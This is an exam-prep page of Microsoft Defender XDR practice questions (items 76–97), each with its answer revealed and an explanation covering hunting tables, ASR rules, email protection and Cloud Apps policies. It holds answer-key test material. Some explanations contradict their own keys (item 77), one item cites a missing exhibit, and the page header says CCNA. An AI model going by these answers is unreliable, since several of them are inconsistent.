Courseiva

CCNA Defender Xdr Security Questions

75 of 197 questions · Page 2/3 · Defender Xdr Security topic · Answers revealed

76
MCQhard

You are a security administrator for a company that uses Microsoft Defender XDR. The security team wants to identify all devices that have communicated with a specific malicious IP address over the past 30 days. They need to run an advanced hunting query. Which table should they query?

A.DeviceEvents
B.DeviceProcessEvents
C.DeviceNetworkEvents
D.DeviceFileEvents
AnswerC

DeviceNetworkEvents contains network connection events from devices, including remote IP addresses and ports. Querying this table allows you to filter by RemoteIP and time range to find devices that communicated with the malicious IP. This is the correct table for network communication history in Microsoft Defender XDR advanced hunting.

Why this answer

DeviceNetworkEvents is the dedicated table for network connection events in Microsoft Defender XDR advanced hunting. It includes fields like RemoteIP, LocalIP, and RemotePort, enabling precise filtering for communications with a specific malicious IP address.

Exam trap

The trap here is confusing general device event tables with the specialized network events table, leading to incomplete or inaccurate query results.

77
Multi-Selectmedium

A security analyst is creating a custom detection rule in Microsoft 365 Defender Advanced Hunting. The rule should trigger when a user receives a phishing email containing a malicious URL and then clicks that URL within 10 minutes. Which two Advanced Hunting tables must be joined in the KQL query?

Select 2 answers
A.EmailEvents and UrlClickEvents
B.EmailEvents and DeviceProcessEvents
C.EmailUrlInfo and UrlClickEvents
D.EmailAttachmentInfo and UrlClickEvents
AnswersA, C

EmailEvents tracks email delivery metadata only, such as sender, recipient, subject, delivery action, and message ID, but it does not enumerate the URLs contained in the message body. UrlClickEvents references the clicked URL but does not include the email's NetworkMessageId unless the URL was part of a Safe Links click from an email, and even then you need URL information to correlate. Without the URL-to-email mapping that EmailUrlInfo provides, joining EmailEvents to UrlClickEvents is not straightforward and would require a separate enrichment step, so this pairing is incorrect for URL-click detection.

Why this answer

The rule requires detecting when a user receives a phishing email with a malicious URL and then clicks that URL within 10 minutes. Two separate joins can accomplish this:

**EmailEvents and UrlClickEvents**: EmailEvents contains metadata about email delivery (including NetworkMessageId), and UrlClickEvents records user clicks on URLs in Microsoft Defender for Office 365 Safe Links. Joining these tables on NetworkMessageId (and optionally URL hash) allows correlating the email receipt with the click event, enabling the time-based trigger.

**EmailUrlInfo and UrlClickEvents**: EmailUrlInfo provides details on URLs found within emails (including the URL and its verdict), and UrlClickEvents logs clicks. Joining on the URL hash (SHA256) directly correlates the email-delivered URL with the user's click, also enabling the time-based trigger.

Both pairs are valid and commonly used depending on the specific data needed. Option B (DeviceProcessEvents) is irrelevant as it deals with process execution, not email or URL clicks. Option D (EmailAttachmentInfo) pertains to attachments, not URLs.

Exam trap

Candidates often assume that only one combination is correct, but both EmailEvents+UrlClickEvents (via NetworkMessageId) and EmailUrlInfo+UrlClickEvents (via UrlHash) are valid ways to link the email to the click. The trick is recognizing that EmailEvents is indeed needed when using that path, and EmailUrlInfo is not required if you directly join on NetworkMessageId.

78
MCQhard

You are a security administrator for a company that uses Microsoft Defender XDR. You need to configure automated investigation and response (AIR) in Microsoft Defender for Endpoint to automatically remediate threats. You want to ensure that when a high-severity alert is triggered, the device is isolated and the malicious file is quarantined without manual intervention. Which setting should you configure?

A.Automation level in Microsoft Defender for Endpoint settings
B.Advanced hunting custom detection rules
C.Attack surface reduction rules
D.Alert notification rules in Microsoft 365 Defender
AnswerA

The automation level setting in Microsoft Defender for Endpoint determines how automated investigations and response actions are taken. Setting it to 'Full - remediate threats automatically' allows the system to automatically isolate devices and quarantine files upon high-severity alerts, achieving the required no-manual-intervention remediation.

Why this answer

The automation level setting in Microsoft Defender for Endpoint controls whether automated investigations automatically remediate threats. Setting it to full automation enables the system to isolate devices and quarantine files without human intervention when high-severity alerts occur, meeting the requirement.

Exam trap

The trap here is assuming that custom detection rules or alert notifications can perform remediation, but they only detect or notify, not act.

79
MCQhard

A security analyst has identified a new malware sample with SHA256 hash 'abc123...'. They need to immediately block this file from executing on any managed endpoint across the organization. Which Microsoft Defender for Endpoint capability should they use?

A.Attack surface reduction rules
B.Indicators (IoC)
C.Automated investigation and response
D.Threat analytics
AnswerB

Indicators of compromise (IoC) in Microsoft 365 Defender for Endpoint let administrators explicitly define block actions for known malicious artifacts, including file SHA-256 hashes, IP addresses, URLs, and domains. After the analyst obtains the malware sample's exact hash, they can create a file indicator (with action 'Block and remediate') so that Defender blocks execution across managed endpoints. This is the only option here that directly provides granular, hash-based allow/block control rather than relying on behavioral heuristics or post-detection response.

Why this answer

Indicators of Compromise (IoC) in Microsoft Defender for Endpoint allow security analysts to create custom indicators (such as file hashes, IPs, or URLs) that are immediately enforced across all managed endpoints. This capability enables blocking execution of a specific SHA256 hash at the kernel level via the Microsoft Defender Antivirus driver, providing near-instant protection without requiring a signature update or policy change.

Exam trap

The trap here is that candidates confuse Indicators (IoC) with Attack Surface Reduction rules, mistakenly thinking ASR rules can block specific file hashes, when in fact ASR rules only block behavioral patterns and cannot target individual file hashes.

How to eliminate wrong answers

Option A is wrong because Attack Surface Reduction (ASR) rules are policy-based rules that target specific behaviors (e.g., blocking Office apps from creating child processes), not individual file hashes; they cannot block a single SHA256 hash on demand. Option C is wrong because Automated Investigation and Response (AIR) is a post-breach remediation workflow that triggers after detection, not a proactive blocking mechanism for a known IoC. Option D is wrong because Threat Analytics is a reporting and intelligence feature that provides threat summaries and mitigations, not a direct enforcement action to block file execution.

80
MCQhard

Your company has deployed Microsoft Defender for Endpoint on all Windows devices. You are investigating an alert for a suspicious PowerShell command that was blocked by Attack Surface Reduction (ASR) rules. The alert shows the command was executed from a script embedded in a Word document. You need to identify the ASR rule that blocked this activity. Which rule is most likely responsible?

A.Block Office applications from creating child processes
B.Block Office applications from making Win32 API calls
C.Block Office applications from injecting code into other processes
D.Block Office applications from creating executable content
AnswerA

This ASR rule is specifically designed to block Office applications from spawning child processes, such as when Word launches PowerShell via a malicious macro. In this attack chain, the macro directly invokes PowerShell as a new process, so blocking child process creation breaks the execution chain at the critical point. Other ASR rules target different stages like API calls or code injection, but the core action here is the creation of the child process.

Why this answer

The ASR rule 'Block Office applications from creating child processes' is designed to stop Office apps (Word, Excel, PowerPoint) from spawning processes like powershell.exe, cmd.exe, or wscript.exe. A malicious macro in a Word document that launches PowerShell is the textbook trigger for this rule, which is why it is the most likely blocker.

Exam trap

The trap is conflating ASR rules that all mention 'Office applications' — candidates must distinguish child-process creation from API calls, code injection, and executable content creation.

How to eliminate wrong answers

Option B is wrong because 'Block Office applications from making Win32 API calls' targets direct API invocation from Office processes, not the spawning of a child PowerShell process. Option C is wrong because 'Block Office applications from injecting code into other processes' addresses process injection (e.g., via CreateRemoteThread), which is a different technique than launching a child process. Option D is wrong because 'Block Office applications from creating executable content' focuses on writing executable files to disk from Office, not on executing a script interpreter as a child process.

81
MCQhard

Your company uses Microsoft Defender XDR and Microsoft Defender for Cloud Apps. You have discovered that a user's credentials were compromised and used to access a SaaS application from an unusual location. You need to automatically suspend the user's access to all cloud apps and require a password reset. The suspension should be immediate upon detection. What should you do?

A.In Microsoft Defender for Cloud Apps, create a session policy that uses the 'Suspend user' governance action and configure it to require password reset.
B.Create a playbook in Microsoft Sentinel that disables the user account in Microsoft Entra ID.
C.Set up a conditional access policy in Microsoft Entra ID to block all access from unusual locations.
D.Configure an automated investigation rule in Microsoft Defender XDR to reset the user's password.
AnswerA

Correct: Cloud Apps can suspend user and trigger password reset via integration with Entra ID.

Why this answer

Microsoft Defender for Cloud Apps allows you to create a session policy with the 'Suspend user' governance action, which can automatically suspend the user's access to all cloud apps upon detection of anomalous activity. Additionally, you can configure the policy to require a password reset, ensuring immediate remediation. Option B is wrong because a Microsoft Sentinel playbook can disable the user account but does not inherently force a password reset, and the response may not be immediate due to playbook execution delays.

Option C is wrong because a conditional access policy in Microsoft Entra ID can block access from unusual locations but does not suspend the user or require a password reset. Option D is wrong because Microsoft Defender XDR automated investigation rules cannot reset passwords; that action is not available in Defender XDR.

82
MCQmedium

You are a security administrator for Northwind Traders. You use Microsoft Defender XDR. You need to identify all devices that have communicated with a specific IP address associated with a known threat in the last 30 days. You want to use advanced hunting to find this information. Which table should you query?

A.DeviceNetworkEvents
B.DeviceFileEvents
C.DeviceEvents
D.DeviceLogonEvents
AnswerA

The DeviceNetworkEvents table in advanced hunting contains information about network connections initiated by or involving devices, including remote IP addresses. Querying this table allows you to filter for the specific IP address and the time range, returning the devices that communicated with it. This directly answers the requirement.

Why this answer

Advanced hunting in Microsoft Defender XDR includes the DeviceNetworkEvents table, which logs network connections and associated remote IP addresses. To find devices that communicated with a specific IP, you query DeviceNetworkEvents, filter by the RemoteIP column for the threat IP, and restrict the Timestamp to the last 30 days. This yields the required device list.

Exam trap

The trap here is assuming that DeviceEvents captures all network activity, when it primarily records process, file, and registry events.

83
MCQhard

A security administrator needs to block users from running portable executable files (e.g., .exe, .scr) that were downloaded from the internet on Windows devices. Which Attack Surface Reduction (ASR) rule should the administrator enable to meet this requirement?

A.Block executable files from running unless they meet a prevalence, age, or trusted list criterion
B.Block credential stealing from the Windows local security authority subsystem (lsass.exe)
C.Block Adobe Reader from creating child processes
D.Block persistence through WMI event subscription
AnswerA

This correct ASR rule (GUID: 01443614-cd74-433a-b99e-2ecdc07bfc25) evaluates every executable launched against Microsoft's cloud reputation service, checking prevalence, age, and any tenant-configured trusted list. Files that are unknown, new, or untrusted are blocked at the point of execution, which directly addresses the requirement to block users from running portable executables like .exe and .scr downloads. Because it operates on the executable itself, it is the only option that matches the stated intent.

Why this answer

The ASR rule 'Block executable files from running unless they meet a prevalence, age, or trusted list criterion' (GUID: 01443614-cd74-433a-b99e-2ecdc07bfc25) specifically targets executable files (e.g., .exe, .scr) that have been downloaded from the internet by checking their Mark-of-the-Web (MoTW) attribute. When enabled, this rule prevents execution of such files unless they meet criteria like high prevalence, sufficient age, or inclusion in a trusted list, directly addressing the requirement to block internet-downloaded portable executables.

Exam trap

The trap here is that candidates often confuse ASR rules focused on execution control (like blocking downloaded executables) with rules that block specific attack techniques (like credential theft or persistence), leading them to select a rule that addresses a different threat vector entirely.

How to eliminate wrong answers

Option B is wrong because the ASR rule 'Block credential stealing from the Windows local security authority subsystem (lsass.exe)' (GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2) protects against credential theft via LSASS access, not against running internet-downloaded executables. Option C is wrong because the ASR rule 'Block Adobe Reader from creating child processes' (GUID: 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c) only restricts Adobe Reader from spawning child processes, which is unrelated to blocking execution of downloaded .exe or .scr files. Option D is wrong because the ASR rule 'Block persistence through WMI event subscription' (GUID: e6db77e5-3df2-4cf1-b95a-636979351e5b) targets WMI-based persistence techniques, not the execution of internet-downloaded portable executables.

84
MCQhard

A security analyst needs to create a custom detection rule in Microsoft Defender XDR that triggers when a device communicates with a new, unclassified IP address flagged by Microsoft threat intelligence as potentially malicious. The rule must run every hour and create an incident if the count of such communications exceeds 10 in a 24-hour window. Which type of rule should the analyst create?

A.custom detection rule using advanced hunting
B.scheduled alert rule in Microsoft Sentinel
C.An incident creation rule in Microsoft Defender for Cloud Apps
D.custom remediation action rule
AnswerA

Custom detection rules in Microsoft Defender XDR are built on advanced hunting queries written in Kusto Query Language (KQL). These queries can be scheduled to run periodically across the tenant's extended data schema, and when the query results meet defined thresholds, the rule generates an incident for investigation. This is the native mechanism for creating custom detections directly within the Defender XDR portal, making it the correct choice.

Why this answer

A custom detection rule using advanced hunting is the correct choice because Microsoft Defender XDR allows you to create custom detection rules based on Kusto Query Language (KQL) queries that run on a scheduled interval (e.g., every hour). This rule can query the `DeviceNetworkEvents` table to identify communications with IP addresses flagged as malicious by Microsoft threat intelligence, aggregate the count over a 24-hour sliding window, and trigger an incident when the threshold of 10 is exceeded. This directly meets the requirement for a scheduled, threshold-based detection within Defender XDR.

Exam trap

The trap here is that candidates often confuse the scope of Microsoft Defender XDR custom detections with Microsoft Sentinel scheduled alert rules, assuming any scheduled query must be in Sentinel, but Defender XDR's advanced hunting custom detections natively support scheduled queries and incident creation without requiring Sentinel.

How to eliminate wrong answers

Option B is wrong because a scheduled alert rule in Microsoft Sentinel is designed for Azure-based SIEM and SOAR capabilities, not for native custom detection within Microsoft Defender XDR; Sentinel operates on a different data ingestion pipeline and is not the correct tool for creating rules that run directly in the Defender XDR portal. Option C is wrong because an incident creation rule in Microsoft Defender for Cloud Apps focuses on app-level anomalies and cloud application behaviors, not on device-level network communications with IP addresses flagged by threat intelligence. Option D is wrong because a custom remediation action rule is used to define automated response actions (e.g., isolating a device or running a script) after a detection occurs, not to define the detection logic or scheduling itself.

85
MCQeasy

A user receives an email from an unknown sender with a .zip attachment. The attachment contains a potentially malicious executable file. Microsoft Defender for Office 365 is enabled. Which feature dynamically detonates the attachment in a sandbox environment and blocks it if malicious behavior is detected?

A.Safe Attachments
B.Safe Links
C.Anti-phishing
D.Anti-spam
AnswerA

Safe Attachments is the correct answer because it uses behavioral analysis, machine learning, and sandbox detonation to inspect email attachments such as a zip file. When a message contains a zip, Safe Attachments extracts the archive and detonates its contents in a controlled, isolated environment, monitoring for malicious actions like process injection, file writes, or network calls. This catches zero-day and polymorphic malware that signature-based scanners miss, and the email is held until analysis completes.

Why this answer

Safe Attachments is the correct feature because it specifically detonates email attachments in a dynamic sandbox environment, analyzing behavior in real time. If the .zip file contains a malicious executable, Safe Attachments will block the email before delivery, preventing the user from accessing the threat. This is distinct from other Defender for Office 365 features that focus on URLs, phishing content, or spam filtering.

Exam trap

The trap here is that candidates confuse Safe Attachments with Safe Links, assuming both handle attachments, but Safe Links only rewrites and checks URLs, not file payloads.

How to eliminate wrong answers

Option B is wrong because Safe Links protects against malicious URLs within emails or Office documents, not file attachments. Option C is wrong because Anti-phishing policies detect impersonation and spoofing attempts, not executable file analysis. Option D is wrong because Anti-spam policies filter bulk or junk email based on sender reputation and content, not dynamic file detonation.

86
MCQhard

You are hunting for malicious activity in Microsoft 365 Defender. The exhibit shows a KQL query. What is the query searching for?

A.PowerShell processes with standard command line arguments
B.Processes that created PowerShell processes
C.PowerShell processes that were downloaded from the internet
D.PowerShell processes with encoded command line arguments
AnswerD

The query filters process command lines for encoded arguments, a common obfuscation technique where Base64 hides malicious PowerShell payloads. Matching on encoded command line indicators surfaces this behaviour, satisfying the stem's hunt for malicious activity in Microsoft 365 Defender.

Why this answer

The KQL query filters PowerShell process creation events where the command line contains encoded command indicators such as '-enc', '-EncodedCommand', or Base64-looking strings. This pattern is a classic detection for obfuscated PowerShell used by attackers to hide malicious scripts from casual inspection and simple string-based defenses.

Exam trap

MS-102 often tests whether candidates can distinguish between detection logic based on command-line content versus process lineage or network behavior, causing them to pick the parent-process or download-origin option.

How to eliminate wrong answers

Option A is wrong because standard command line arguments would not match the encoded-command pattern the query targets. Option B is wrong because the query filters on PowerShell processes themselves, not on parent processes that spawned PowerShell. Option C is wrong because the query does not inspect network origin or download activity; it only examines the command line content of PowerShell executions.

87
Multi-Selectmedium

A security analyst is creating a custom detection rule in Microsoft 365 Defender Advanced Hunting. The rule should trigger when a device makes an outbound connection to a known malicious IP address, and within 10 minutes, a process with suspicious command-line arguments is started on the same device. Which two Advanced Hunting tables must be joined using a KQL query to create this detection?

Select 1 answer
A.DeviceNetworkEvents and DeviceProcessEvents.
B.DeviceEvents and DeviceLogonEvents.
C.DeviceProcessEvents and DeviceFileEvents.
D.DeviceNetworkEvents and DeviceRegistryEvents.
AnswersA

DeviceNetworkEvents supplies outbound connection records, including RemoteIP, while DeviceProcessEvents captures process starts with ProcessCommandLine. Joining both on DeviceId and aligning timestamps within the 10-minute window satisfies the correlation requirement, since no single table holds network and process-creation data together.

Why this answer

The detection rule correlates an outbound network connection to a known malicious IP with a subsequent process creation on the same device within 10 minutes. This requires joining DeviceNetworkEvents (for network connections) with DeviceProcessEvents (for process creation and command-line arguments). DeviceFileEvents is not needed because the rule does not involve file events.

Therefore, only Option A provides the necessary tables.

Exam trap

Candidates might think that file events or other tables are also required, but the scenario specifically pairs network events with process events on the same device within a time window. Joining DeviceProcessEvents with DeviceFileEvents would be irrelevant.

88
MCQeasy

A security administrator wants to review email messages that were blocked due to a malware detection in Microsoft Defender for Office 365. Which report should they use?

A.Submissions report
B.Spoof intelligence report
C.Mailflow map report
D.Threat Protection Status report
AnswerD

The Threat Protection Status report aggregates detections across Exchange Online Protection and Defender for Office 365, including malware blocked by anti-malware policies. It satisfies the requirement to review blocked email messages by surfacing malware detections with details such as recipient, sender, and detection technology, enabling the administrator to investigate the specific blocked items.

Why this answer

The Threat Protection Status report in Microsoft Defender for Office 365 provides details on email messages blocked due to malware, phishing, or other threats. It includes data on detections by type and allows administrators to review blocked messages. The Submissions report is for user/admin submissions of suspicious email, the Spoof intelligence report covers spoofing, and the Mailflow map report visualizes mail flow, not blocked malware messages.

Exam trap

MS-102 often tests the specific purpose of each Defender for Office 365 report — candidates confuse the Submissions report (user-reported emails) with the Threat Protection Status report (system-detected threats), leading to wrong answers when asked about reviewing blocked malware messages.

How to eliminate wrong answers

Option A is wrong because the Submissions report tracks emails submitted by users or admins for analysis, not the overall blocked malware messages. Option B is wrong because the Spoof intelligence report focuses on spoofing detections and allow/block decisions for spoofed senders, not malware blocks. Option C is wrong because the Mailflow map report is a visual representation of mail flow through the organization, not a report of blocked malware messages.

89
MCQhard

Your organization is implementing Microsoft Defender for Cloud Apps. You need to configure anomaly detection policies to alert when a user downloads an unusually large number of files from SharePoint Online. Which data source should you connect to enable this detection?

A.API connector for custom apps
B.App connector for SharePoint Online
C.Microsoft 365 Defender portal
D.Microsoft Entra ID logs
AnswerB

The App connector for SharePoint Online is the correct data source because it uses the Office 365 Management Activity API to capture user-level file activities such as downloads, uploads, edits, and permissions changes from SharePoint. When enabled in Microsoft Defender for Cloud Apps, it continuously ingests these events, which are essential for anomaly detection scenarios like unusual mass downloading or impossible travel. This connector directly provides the file-level context that sign-in logs and management portals lack, making it the single authoritative source for this requirement.

Why this answer

To detect anomalous file downloads from SharePoint Online, Microsoft Defender for Cloud Apps requires direct integration with the service via an App connector. The App connector for SharePoint Online (option B) enables the collection of metadata and activity logs necessary for anomaly detection policies, such as the 'Unusual file download by a user' policy. Without this connector, Defender for Cloud Apps cannot monitor SharePoint Online activities.

Exam trap

The trap here is that candidates often confuse Microsoft 365 Defender portal (a viewing/management interface) with a data source, or assume that Microsoft Entra ID logs contain sufficient activity data for file-level anomaly detection, when in fact only the App connector provides the necessary SharePoint Online activity metadata.

How to eliminate wrong answers

Option A is wrong because the API connector for custom apps is designed for third-party or custom applications that are not natively supported, not for connecting to Microsoft cloud services like SharePoint Online. Option C is wrong because Microsoft 365 Defender portal is the unified interface for viewing alerts and incidents, not a data source that provides activity logs to Defender for Cloud Apps. Option D is wrong because Microsoft Entra ID logs contain sign-in and authentication events, not the granular file download activities from SharePoint Online that are required for anomaly detection.

90
Multi-Selecthard

Which TWO components are part of Microsoft Defender XDR?

Select 2 answers
A.Microsoft Defender for Office 365
B.Microsoft Purview
C.Microsoft Defender for Endpoint
D.Microsoft Intune
E.Microsoft Sentinel
AnswersA, C

Microsoft Defender for Office 365 is one of the workload pillars composing Microsoft Defender XDR, feeding email, collaboration and phishing signals into the unified incident graph. Its native integration with Defender for Endpoint, Identity and Cloud Apps satisfies the stem's requirement for a constituent component of the suite.

Why this answer

Microsoft Defender XDR is a unified extended detection and response suite that natively correlates signals across Microsoft's first-party security workloads, and Microsoft Defender for Office 365 (option A) is one of its core pillars, delivering protection against phishing, malware, and business email compromise across Exchange Online, Teams, and SharePoint/OneDrive. Microsoft Defender for Endpoint (option C) is likewise a native Defender XDR component, providing endpoint detection and response, attack surface reduction, and automated investigation and remediation that feed into the unified incident queue. By contrast, Microsoft Purview (option B) is a separate compliance and data-governance solution family (information protection, DLP, eDiscovery), Microsoft Intune (option D) is the cloud-based endpoint management/MDM service in the Microsoft Intune family, and Microsoft Sentinel (option E) is a standalone cloud-native SIEM/SOAR product that integrates with Defender XDR but is not itself one of its constituent workloads.

Exam trap

MS-102 often tests whether candidates confuse Defender XDR components with adjacent Microsoft security and compliance products like Purview, Intune, and Sentinel.

91
MCQmedium

Your organization uses Microsoft Defender for Identity. You receive an alert about a suspicious LDAP query from a domain controller. After investigating, you determine the query is legitimate. How should you prevent future alerts for this activity?

A.Create a suppression rule for that alert type and entity.
B.Create a custom detection rule to allow the LDAP query.
C.Disable the Defender for Identity sensor on the domain controller.
D.Change the alert severity to Low.
AnswerA

Suppression rules in Microsoft Defender for Identity silence matching alerts by type and entity, so the confirmed-benign LDAP query from that domain controller stops generating alerts. This satisfies the stem's requirement to prevent future alerts for legitimate activity.

Why this answer

Microsoft Defender for Identity suppression rules are the designed mechanism for silencing alerts that have been triaged as benign. A suppression rule scoped to the specific alert type (e.g., 'Suspicious LDAP query') and the specific entity (the domain controller or account) prevents future identical alerts from being raised without weakening detection for the rest of the environment. This preserves the integrity of the detection pipeline while eliminating noise from known-good activity.

Exam trap

MS-102 often tests the difference between suppressing a specific alert (scoped to alert type + entity) and disabling the sensor or detection entirely — candidates who pick the 'disable' option fail to recognize that suppression is the surgical, non-disruptive fix.

How to eliminate wrong answers

Option B is wrong because custom detection rules in Defender XDR are used to create new detections from advanced hunting queries, not to whitelist or allow existing activity — there is no 'allow' action that suppresses an existing Defender for Identity alert. Option C is wrong because disabling the Defender for Identity sensor on the domain controller stops all identity telemetry from that DC, creating a massive blind spot and defeating the purpose of the sensor rather than addressing a single noisy alert. Option D is wrong because lowering the severity of an alert does not prevent it from being generated or appearing in the incident queue — it merely changes its classification, so the analyst would still receive the same alert repeatedly.

92
MCQeasy

You need to integrate Microsoft Defender XDR with Microsoft Sentinel for centralized monitoring. Which data connector should you use?

A.Microsoft Defender for Cloud connector
B.Azure Security Center connector
C.Microsoft 365 Defender connector
D.Microsoft Defender XDR connector
AnswerD

The Microsoft Defender XDR connector is the native Microsoft Sentinel data connector that connects directly to Microsoft Defender XDR through its public API. It ingests incidents, alerts, and advanced hunting event tables from all Microsoft Defender workloads, automatically correlating signals from Endpoint, Identity, Office 365, and Cloud Apps into a Sentinel incident. This bidirectional sync allows incident updates in either portal to propagate to the other, which is exactly what is needed when integrating Microsoft Defender XDR with Microsoft Sentinel.

Why this answer

The Microsoft Defender XDR connector (option D) is the correct choice because it ingests signals from all Microsoft 365 Defender components—including Defender for Endpoint, Office 365, Identity, and Cloud Apps—into Microsoft Sentinel. This connector uses the Microsoft 365 Defender API to stream unified alerts and incidents, enabling centralized monitoring and correlation across the entire XDR stack.

Exam trap

The trap here is that candidates confuse the 'Microsoft 365 Defender connector' (which does not exist) with the 'Microsoft Defender XDR connector', or they mistakenly choose the Defender for Cloud connector thinking it covers all Microsoft security signals.

How to eliminate wrong answers

Option A is wrong because the Microsoft Defender for Cloud connector is designed to ingest security alerts and posture data from Azure, on-premises, and other cloud workloads, not from Microsoft 365 Defender's XDR components. Option B is wrong because the Azure Security Center connector is a legacy name that has been replaced by Microsoft Defender for Cloud; it does not provide the unified incident and alert stream from Microsoft 365 Defender. Option C is wrong because there is no connector named 'Microsoft 365 Defender connector'—the correct connector name is 'Microsoft Defender XDR connector', and the former would imply a different API endpoint or data type.

93
MCQhard

You are the security administrator for a multinational organization using Microsoft 365 E5. The organization has 10,000 users across three regions: North America, Europe, and Asia. You have deployed Microsoft Defender for Endpoint on all Windows devices and enabled Microsoft Defender for Office 365. Recently, a sophisticated phishing campaign targeted executives in Europe, using a custom domain that closely resembles your legitimate domain (e.g., contoso.com vs. contos0.com). The emails bypassed anti-spam and anti-phishing policies. You need to configure protection to block these impersonation attempts without affecting legitimate emails from the actual domain. You must also ensure that any similar future attempts using different variations are automatically detected. What should you do?

A.Create a Safe Links policy with a block action for URLs containing 'contos0.com'.
B.Enable mailbox intelligence in anti-phishing policies to detect unusual sender behavior.
C.Add the spoofed domain 'contos0.com' to the Tenant Allow/Block List in the Defender for Office 365 portal.
D.Configure an anti-phishing policy to protect against impersonation of your domain, enabling the 'Protect against impersonation of domains I own' setting and adding your legitimate domain to the list of domains to protect.
AnswerD

Domain impersonation protection in an anti-phishing policy uses the 'domains I own' setting, adding contoso.com so lookalike senders such as contos0.com are blocked while genuine mail passes. This satisfies the requirement to block variations without affecting legitimate domain traffic.

Why this answer

Anti-phishing policies in Microsoft Defender for Office 365 include a dedicated domain impersonation setting called 'Protect against impersonation of domains I own.' By enabling this and adding contoso.com to the protected domains list, Defender uses its impersonation detection engine to catch lookalike domains (contos0.com, contoso.co, etc.) using homoglyph, typo, and character-substitution analysis — not just exact string matches. This automatically generalizes to future variations without needing to enumerate each spoofed domain manually.

Exam trap

MS-102 often tests the difference between static block lists (Tenant Allow/Block List) and dynamic impersonation detection — candidates pick the block list because it feels concrete, but the exam requires the setting that automatically generalizes to new lookalike domains.

How to eliminate wrong answers

Option A is wrong because Safe Links only rewrites and detonates URLs at click time; it does not detect sender-domain impersonation, and blocking a literal string 'contos0.com' would not catch future variations like 'contos0.co' or 'c0ntoso.com'. Option B is wrong because mailbox intelligence detects anomalous sender behavior per-user (based on historical communication patterns), not domain lookalike impersonation, and it would not reliably catch a first-time spoofed domain targeting executives. Option C is wrong because the Tenant Allow/Block List is a static, exact-match list — it blocks only the specific entry 'contos0.com' and provides no automatic detection of new lookalike domains, which the question explicitly requires.

94
Matchingmedium

Match each Microsoft 365 compliance feature to its purpose.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Prevents sensitive data from being shared

Searches and exports content for legal cases

Keeps or deletes content based on rules

Classifies and protects data

Records user and admin activities

Why these pairings

Correct matches: DLP prevents accidental sharing, eDiscovery searches for legal needs, and Sensitivity Labels classify/protect data. Common confusions include mixing DLP with retention policies and eDiscovery with automatic classification.

95
MCQhard

Your organization has deployed Microsoft Defender for Cloud Apps. You need to ensure that all external file sharing to untrusted domains is automatically blocked. The solution must not affect internal sharing. What should you configure?

A.Create an access policy in Microsoft Defender for Cloud Apps to block access from untrusted domains.
B.Create a file policy in Microsoft Defender for Cloud Apps with a governance action to remove external users.
C.Configure an app connector for the cloud app to enforce DLP policies.
D.Create a session policy in Microsoft Defender for Cloud Apps to monitor external sharing.
AnswerB

A file policy in Defender for Cloud Apps scans cloud app repositories for content, exposure, and sharing metadata, and can automatically apply governance actions when conditions are met. By configuring a condition that flags files shared with external domains or unauthorized collaborators, you can select the governance action "Remove external users" to directly strip external principals from the file's access control list (ACL). This is the appropriate mechanism because it is data-centric, works on both existing and new shares, and does not rely on user or session behavior.

Why this answer

A file policy in Microsoft Defender for Cloud Apps can be configured with a governance action to remove external users from shared files when sharing is detected with untrusted domains. This action automatically blocks external sharing without affecting internal sharing, as it targets only external collaborators from domains not on the trusted list.

Exam trap

The trap here is that candidates confuse access policies (which block user access to the app) with file policies (which govern sharing actions on files), leading them to select Option A instead of the correct file policy governance action.

How to eliminate wrong answers

Option A is wrong because access policies in Defender for Cloud Apps control real-time access based on user or device context, not file-sharing actions; they block access to the app itself, not external sharing events. Option C is wrong because configuring an app connector enables monitoring and control of a cloud app but does not by itself enforce DLP policies or block external sharing; it is a prerequisite for policies, not the policy itself. Option D is wrong because session policies monitor and control user sessions in real time (e.g., preventing download or copy), but they do not automatically block external file sharing to untrusted domains; they are designed for conditional access app control, not file governance.

96
MCQhard

A security analyst is investigating a suspected credential theft attack where an attacker attempts to dump credentials from LSASS. Which Attack Surface Reduction (ASR) rule should the administrator enable to block this activity from untrusted processes?

A.Block credential stealing from the Windows local security authority subsystem (lsass.exe)
B.Block Office applications from creating child processes
C.Block executable files from running unless they meet a prevalence, age, or trusted list criterion
D.Block Adobe Reader from creating child processes
AnswerA

This Attack Surface Reduction rule is specifically engineered to prevent untrusted processes from reading the memory space of lsass.exe, the Windows Local Security Authority Subsystem. By blocking read access to LSASS, it directly thwarts credential-dumping techniques used by tools such as Mimikatz, which rely on extracting password hashes or plaintext credentials from that process's memory. This makes it the most targeted and effective rule for the described credential theft scenario.

Why this answer

The ASR rule 'Block credential stealing from the Windows local security authority subsystem (lsass.exe)' (GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2) is specifically designed to prevent untrusted processes from accessing LSASS memory and dumping credentials, such as with tools like Mimikatz. This directly addresses the described attack scenario of credential theft from LSASS, making it the correct choice.

Exam trap

The trap here is that candidates may confuse generic credential theft prevention rules (like Windows Defender Credential Guard) with ASR rules, or mistakenly think that blocking child processes (Option B or D) would stop LSASS dumping, when in fact the attack often involves a direct process handle to lsass.exe rather than spawning a child process.

How to eliminate wrong answers

Option B is wrong because 'Block Office applications from creating child processes' prevents Office apps (e.g., Word, Excel) from spawning child processes like PowerShell or cmd.exe, which is a common technique for lateral movement or payload execution, not specifically for dumping credentials from LSASS. Option C is wrong because 'Block executable files from running unless they meet a prevalence, age, or trusted list criterion' is a cloud-delivered protection rule that restricts unknown executables based on reputation, not a targeted ASR rule for LSASS credential theft. Option D is wrong because 'Block Adobe Reader from creating child processes' prevents Adobe Reader from launching other executables, which is a defense against PDF-based exploits, not a rule designed to block credential dumping from LSASS.

97
MCQhard

A security administrator is configuring Microsoft Defender for Office 365 to protect against zero-day malware in attachments. The administrator wants to use dynamic delivery so that users can view the email body while the attachment is being analyzed. However, the administrator is concerned about false positives and wants to ensure that if a benign attachment is later found to be malicious, it is removed from the user's inbox. What should the administrator configure?

A.Configure a Safe Attachments policy with dynamic delivery and enable ZAP.
B.Configure a Safe Links policy with URL detonation.
C.Configure an anti-phishing policy with mailbox intelligence.
D.Configure an anti-malware policy with common attachments filter.
AnswerA

A Safe Attachments policy with dynamic delivery exposes the attachment to Microsoft's sandbox detonation environment while the message is delivered to the user's mailbox; a placeholder is used until the verdict is clean and the real attachment becomes available. Enabling zero-hour auto purge (ZAP) adds retroactive remediation so that if the system later identifies the message as malicious, it is automatically removed from the mailbox. This combination fulfills the requirement for both low-latency attachment delivery and post-delivery protection.

Why this answer

